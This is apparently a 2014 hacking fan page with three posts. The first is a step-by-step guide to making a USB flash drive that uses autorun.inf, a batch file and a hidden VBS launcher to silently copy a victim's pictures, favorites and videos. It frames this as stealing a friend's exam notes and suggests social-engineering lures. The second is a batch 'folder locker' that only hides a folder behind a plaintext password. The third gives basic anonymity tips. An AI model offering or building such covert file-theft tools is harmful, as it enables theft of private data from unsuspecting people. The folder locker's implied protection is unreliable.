Hacking Hello all fanpage...This is Page that I've create about Hacki and DC. Moreover in this page I am trying to create and
Update all style descript about hack

05/25/2014

Steel Someone Secret File Using USB Flash Drive.
Hi Friends,

Today i am posting a way to steel secret file from your friends computer.

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.
STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2

Open Notepad again and copy-paste the following lines
(code-
off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
off
cls)

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.
STEP 3

Open Notepad once again and copy-paste the following line.
(code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False)

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4

Open Notepad one last time and copy-paste the following line.
(code
wscript.exe \invisible.vbs file.bat)

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

05/25/2014

Make Your Own Folder Locker
we're going to make a hidden folder, it is hidden by a little program, when you open this program, you should type the correct password , so your folder will be seen.

OK, open notepad and write in it :

cls
OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==###X goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==###X goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

replace the ###X by the password you want
save it finally anything.bat

05/25/2014

Be anonymous on internet the Internet

So you think your online activities are private? Think again.

Not only your surfing sessions tracked by websites, search engines and social networks, but often your Internet service provider (ISP), web browser, government and potentially hundreds of online tracking companies.

When surfing (using a browser like Firefox, IE or Opera to access HTTP pages) there is more information transmitted than you would ever guess! Your browser sends information about itself, about your operating system, your language and much more information. This information also tells a lot about your identity and can be used to give you customized text but also against you. This free online analyzer shows you a part of the hidden information sent by your browser: http://proxy-check.squabbel.com/

This post tells you how to be anonymous on the Internet

1) The Proxy:
There are a lot of ways to change your IP Address through various proxy servers! A proxy server can be configured in your browser network-connection settings. When using a online proxy your browser will send all data requests to the proxy, the proxy will route it to the destination and send you back the data. This is "transparent" to you as user; the destination will only see the proxy IP Address.

2)TOR:
It is a free program that will bounce your IP from each of it's relays around the world. Basically, it's just a huge database of proxies that you can access to keep your online identity safe. While using TOR websites will no longer be able to track the physical location of your IP or be able to track what you have been looking at online. TOR has extreme value because it can work with your website browser, remote login applications and even with instant messaging software.

3) Firefox Addons For Anonymous Surfing:
FoxyProxy, Torbutton, AutoProxy, AWB Proxy, Proxy Tool.....

4) Proxy Chrome Extensions for Anonymous Web Browsing:
Proxy Switchy, Switch Proxy, Proxy Anywhere, Proxy SwitchySharp, Hide My Ass.....

This is not a complete list, methods are many more. So please complete it by your comments. Happy anonymous and safe surfing:)

Address

Bronxville, NY
10451

Website

Alerts

Be the first to know and let us send you an email when Hacking posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Shortcuts

Share

Category